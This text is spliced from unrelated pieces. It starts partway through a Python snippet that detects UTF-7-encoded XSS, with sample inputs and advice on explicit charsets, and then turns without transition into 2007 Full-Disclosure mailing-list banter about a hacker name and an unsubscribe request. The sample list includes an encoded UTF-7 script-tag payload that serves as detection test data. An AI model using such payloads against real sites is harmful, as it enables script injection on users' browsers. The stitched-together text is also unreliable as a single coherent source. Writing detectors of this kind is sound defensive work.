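    "q=%2BADw-script%2BAD4-",
    "http://www.example.com/?q=a+b",
    "1+-1=2",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(hides_markup(sample), utf7_view(sample))
```

The same decoding can sit in front of an existing output filter; serving every page with an explicit charset removes the ambiguity the payloads depend on.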


Re: [Full-disclosure] Core Impact 7.5 Web App pen-testing framework, as good as the hype?

2007-10-09 Thread full-disclosure
Mad technical!

On Sun, 07 Oct 2007 19:55:24 -0400 Dude VanWinkle
[EMAIL PROTECTED] wrote:
On 10/7/07, [EMAIL PROTECTED] full-
[EMAIL PROTECTED] wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Dude, your hacker name sucks, Van Winkle.

Thats because its not a hacker handle, but an email address. It is
used to tag outgoing smtp traffic for delivery to my mailbox  for
later retrieval (by me) over the Internet.

Glad I could help you with that,

-JP


Re: [Full-disclosure] UNSUBSCRIBE

2007-10-09 Thread full-disclosure
SHUT UP VLADIS

On Tue, 09 Oct 2007 12:14:08 -0400 [EMAIL PROTECTED] wrote:
On Tue, 09 Oct 2007 10:26:17 +0530, sushil Agarwal said:
 UNSUBSCRIBE

Read RFC2369, then ponder the headers of any message from the list,
and wait for enlightenment.


Re: [Full-disclosure] Core Impact 7.5 Web App pen-testing framework, as good as the hype?

2007-10-09 Thread full-disclosure
What do you mean?

On Tue, 09 Oct 2007 21:18:58 -0400 Dude VanWinkle
[EMAIL PROTECTED] wrote:
Sorry, I didnt mean to go over your head. I will dumb it down for
you next time.

-JP

On 10/9/07, [EMAIL PROTECTED] full-
[EMAIL PROTECTED] wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Mad technical!

 On Sun, 07 Oct 2007 19:55:24 -0400 Dude VanWinkle
 [EMAIL PROTECTED] wrote:
 On 10/7/07, [EMAIL PROTECTED] full-
 [EMAIL PROTECTED] wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Dude, your hacker name sucks, Van Winkle.
 
 Thats because its not a hacker handle, but an email address. It is
 used to tag outgoing smtp traffic for delivery to my mailbox for
 later retrieval (by me) over the Internet.
 
 Glad I could help you with that,
 
 -JP